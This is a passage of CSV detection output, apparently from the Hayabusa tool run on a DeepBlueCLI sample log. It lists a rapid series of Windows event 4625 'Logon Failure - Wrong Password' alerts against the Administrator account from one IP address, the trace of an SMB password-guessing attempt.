NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:16.947 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 943GV3t1muba5IQT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:16.982 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HPVd28zf85AxdGqd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:17.023 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: D6evoSSxcKkHspuc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:17.051 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C4fznmrnIdUH7DzG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:17.099 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AwrrYjUV41P0K5Jh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:17.148 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: z4RBZrALEnH5BKP9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:17.192 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LU6uWH4gs4iHP7rV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:17.237 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hCfhZDAH8ufk77zN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:17.277 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TE9pw4UeRldGeKVc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:17.312 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z8PKE05MqxE5TwXT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:17.357 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GIE5fmddOPBbCM3u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:17.414 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Pveyo4Czx6KWKCGn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:17.453 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zPyyHaRnBec7Qg2x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:17.486 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V3b8mudJp5mdkiEW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:17.524 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7Y6mjLaCzR28Q2qK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:17.563 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dMsNKWEjeCYYQVqw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:17.605 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I7c5fENhkwO6QfEU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:17.648 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Cr1wAeMhPgVpwV82 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:17.692 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fErpp9Ww6LO37C9k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:17.728 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CYsNpBsGT5zOKe3p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:17.866 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sgzUk1Dmttm4AQ3s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:17.921 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Hp0c3YYyOSJuBHCR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:17.965 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gkis4H1MIQPHUwqf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:18.009 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Lb6mH03qKLb8O7Dz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:18.051 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J10xEmhRNWfJ5FCI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:18.093 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5Dujj8A7wwzAwzCp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:18.128 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NVDE3fIoUQfLn3cd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:18.175 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UlD48O0XpFUnuSmo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:18.213 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KyTPKuspADmLpv0L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:18.260 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BdIAPiH32ZbmCgTK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:18.292 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1dEiN2xOA4E9Wl5p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:18.337 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fBeAez2fLjXB0dk3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:18.372 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gQ45aeMDc3Snabvv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:18.420 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QWSYdr4lJlhCLMMW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:18.462 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RgxHY7072aUCdfa0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:18.504 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9yKhEodJDTVCGdIG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:18.597 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z0odyPQmvkGRNWZF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:18.630 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b5uRpG0fxCK75DPV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:18.666 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d9dcEzpJRW5YA8Bj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:18.712 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Hv3B9bwB1YIaBa6N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:18.743 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lJf9Obml4aVxE5zp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:18.776 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mvnSOaRSkGU6Uf5q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:18.808 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JSAkZsZsv0SaLKaO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:18.847 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r6rnM6QbwfbbrcGy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:18.888 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RX0GW7K5wdQJUx4Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:18.920 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xm7CpD5i735McsvS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:18.959 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bHxjZsnR25J47Ez8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:18.999 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J1JWj91m79FyykH6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:19.043 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h9i0GncOzpz5REWp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:19.085 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BODZRJ6G3xxw29VJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:19.127 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SJ2lq4piINfmI7Qe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:19.167 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NqDeXdOitJ3WY8w4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:19.217 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FnoHQf7QDxoI4tel | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:19.261 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FqkbgrtBa5VFxPry | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:19.300 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TMD57GtY15bfWBre | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:19.350 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e3lT9UgWr82PcAjf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:19.388 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SpwhTfFlvvccnI5N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:19.432 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 10CfKdnvWf4UVuME | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:19.539 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YYLMax3okIqntHM1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:19.602 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qk9TPAK51EdVORwY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:19.670 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aVKRUnNu2nGslW7P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:19.720 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZJ2AYRLcMbMVixg6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:19.759 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6Sl9ucxM2Nu3xjNq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:19.801 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AFeBGB6qA7OaYV7l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:19.837 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KLUEKG9CzQYsH3Vp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:19.875 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vVZ44YKdRYY59zaC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:19.921 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: umU8pDDZFvvUVsHY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:19.965 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Nn7rA0uRegtHgaF1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:20.008 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2dgiakCKweT4GUGD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:20.039 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kptipiLujNVePYfy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:20.091 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: plaXJ1rEGpU3SzV2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:20.132 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I4pALF2luLfg36GC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:20.173 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZLO4cufbFcRhRy8b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:20.215 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a845OfrFKxy31Yhg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:20.252 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QnPM7uhs8y4BaP6I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:20.288 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7fW5FzQ4jbWDJxXc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:20.326 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: huKy3ruTPAlx94pI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:20.363 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g78Kx7hkMuUGIoX1 